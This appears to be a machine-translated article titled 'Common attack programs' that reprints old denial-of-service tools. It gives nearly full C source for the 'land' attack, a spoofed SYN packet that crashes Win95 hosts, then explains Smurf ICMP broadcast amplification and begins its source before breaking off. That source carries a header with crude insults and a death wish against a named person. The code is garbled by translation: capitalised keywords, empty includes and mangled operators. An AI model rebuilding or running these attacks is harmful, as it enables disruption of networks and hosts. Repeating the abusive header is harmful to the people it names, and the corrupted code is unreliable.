Common attack programs
Abstract
There are some old ones, which seem useless now, but they are all famous.
1 Land
Attack A Win95 machine. This is a vulnerability in Win95.
If you initiate a connection (SYN) on the same port, Win95 will crash.
/* Land. c by m3lt, FLC
Crashes a win95 box */
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
// The pseudo header used for TCP checksum
Struct pseudo-HDR
{
Struct in_addr saddr;
Struct in_addr daddr;
U_char zero;
U_char protocol;
U_short length;
Struct tcphdr tcpheader;
};
// Calculate IP checksum
U_short checksum (u_short * data, u_short length)
{
Register long value;
U_short I;
For (I = 0; I <(length> 1); I ++)
Value + = data [I];
If (length & 1) = 1)
Value + = (data [I] <8 );
Value = (value & 65535) + (value> 16 );
Return (~ Value );
}
Int main (int argc, char ** argv)
{
Struct sockaddr_in sin;
Struct hostent * hoste;
Int sock;
Char buffer [40];
Struct iphdr * ipheader = (struct iphdr *) buffer;
Struct tcphdr * tcpheader = (struct tcphdr *) (buffer + sizeof (struct iphdr ));
Struct pseudo-HDR pseudo header;
Fprintf (stderr, "land. c by m3lt, FLC ");
If (argc <3)
{
Fprintf (stderr, "usage: % s IP port", argv [0]);
Return (-1 );
}
Bzero (& sin, sizeof (struct sockaddr_in ));
Sin. sin_family = AF_INET;
If (hoste = gethostbyname (argv [1])! = NULL)
Bcopy (hoste-> h_addr, & sin. sin_addr, hoste-> h_length );
Else if (sin. sin_addr.s_addr = inet_addr (argv [1]) =-1)
{
Fprintf (stderr, "unknown host % s", argv [1]);
Return (-1 );
}
If (sin. sin_port = htons (atoi (argv [2]) = 0)
{
Fprintf (stderr, "unknown port % s", argv [2]);
Return (-1 );
}
// New SOCK-RAW to generate fake IP packets, which requires the root permission
If (sock = socket (AF_INET, so__raw, 255) =-1)
{
Fprintf (stderr, "couldnt allocate raw socket ");
Return (-1 );
}
Bzero (& buffer, sizeof (struct iphdr) + sizeof (struct tcphdr ));
Ipheader-> version = 4;
Ipheader-> ihl = sizeof (struct iphdr)/4;
Ipheader-> tot_len = htons (sizeof (struct iphdr) + sizeof (struct tcphdr ));
Ipheader-> id = htons (0xF1C );
Ipheader-> ttl = 255;
Ipheader-> protocol = IP_TCP;
// The destination IP address and source IP address are the same
Ipheader-> saddr = sin. sin_addr.s_addr;
Ipheader-> daddr = sin. sin_addr.s_addr;
// The destination TCP port is the same as the source TCPIP Port
Tcpheader-> th_sport = sin. sin_port;
Tcpheader-> th_dport = sin. sin_port;
Tcpheader-> th_seq = htonl (0xF1C );
Tcpheader-> th_flags = TH_SYN;
Tcpheader-> th_off = sizeof (struct tcphdr)/4;
Tcpheader-> th_win = htons (2048 );
Bzero (& pseudo header, 12 + sizeof (struct tcphdr ));
Pseudo header. saddr. s_addr = sin. sin_addr.s_addr;
Pseudo header. daddr. s_addr = sin. sin_addr.s_addr;
Pseudo header. protocol = 6;
Pseudo header. length = htons (sizeof (struct tcphdr ));
Bcopy (char *) tcpheader, (char *) & pseudo header. tcpheader, sizeof (struct tcphdr ));
Tcpheader-> th_sum = checksum (u_short *) & pseudo header, 12 + sizeof (struct tcphdr ));
If (sendto (sock, buffer, sizeof (struct iphdr) + sizeof (struct tcphdr ),
0, (struct sockaddr *) & sin, sizeof (struct sockaddr_in) =-1)
{
Fprintf (stderr, "couldnt send packet ");
Return (-1 );
}
Fprintf (stderr, "% s: % s landed", argv [1], argv [2]);
Close (sock );
Return (0 );
}
2 Smurf
The smurf attack is very simple. It has some IP addresses (broadcast addresses) and sends some fake numbers.
An ICMP echo request causes a broadcast storm, which can make the victim host a counterfeit packet.
.
There are two types of victims: the middle device (bounce sites switch or router) and the disguised IP (those
All icmp echo packets are sent to it ). This attack relies on vrouters to convert a broadcast address into a broadcast subnet.
(For example, Ethernet, FF: FF). RFC allows this type of conversion, but it does not seem necessary today.
You can disable the layer-3 broadcast (IP) to layer-2 broadcast (Ethernet ).
However, the Smb server or NT needs remote broadcast to make the LAN know its existence, but the above configuration on the router will make this change
Impossible (when there is no WINS Server ).
/*
*
* $ Id smurf. c, v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* Spoofs icmp packets from a host to varous broadcast addresses resulting
* In multiple replies to that host from a single packet.
*
* Mad head:
* Nyt, soldier, autopsy, legendnet, # c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* Incluted vaseline, fyber for trying, knowy, old school # havok, kain
* Cos he rox my sox, zuez, toxik, robocod, and everyone else that I might
* Have missed (you know who you are ).
*
* Hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* Thing he is (hes-almost-as stubborn as me, still I managed to pick up
* Half the cheque ).
*
* And a special hi to Todd, face it dude, youre fucking awesome.
*
* Mad anal:
* # Madcrew/# conflict for not cashing in their cluepons, EFnet IRCOps
* Because they plain suck, Rolex for being a twit, everyone that
* Trades warez, Caren for being a lesbian hoe, AcidKill for being her
* Partner, # cha0s, sedriss for having an ego in inverse proportion
* His penis and anyone that cant pee standing up -- you dont know what
* Your missing out on.
*
* And anyone thats ripped my code (diff smurf. c axcast. c is rather
* Interesting ).
*
* And a huge twice the size of soldiers fuck to amm fuck you to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* No respect but youre a manipulating prick who tried to take away
* Most important thing in the world to me with no guilt whatsoever, and
* For that I wish you nothing but pain. Die.
*
* Disclaimer:
* I cannot and will not be held responsible nor legally bound for
* Malicious activities of individuals who come into possession of this
* Program and I refuse to provide help or support of any kind and do NOT
* Condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Dont abuse this.
*
* Well, I really, really, hate this code, but yet here I am creating another
* Disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* Like most programmers dont like seeing bugs in their code. I saw a few
* Things that shoshould have been done better or needed fixing so I fixed
* Them.-shrug-, programming for me as always seemed to take the pain away
*...
*
*
*/
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
Void banner (void );
Void usage (char *);
Void smurf (int, struct sockaddr_in, u_long, int );
Void ctrlc (int );
Unsigned short in_chksum (u_short *, int );
/* Stamp */
Char id [] = "$ Id smurf. c, v 4.0 1997/10/11 13:02:42 EST tfreak Exp $ ";
Int main (int argc, char * argv [])
{
Struct sockaddr_in sin;
Struct hostent * he;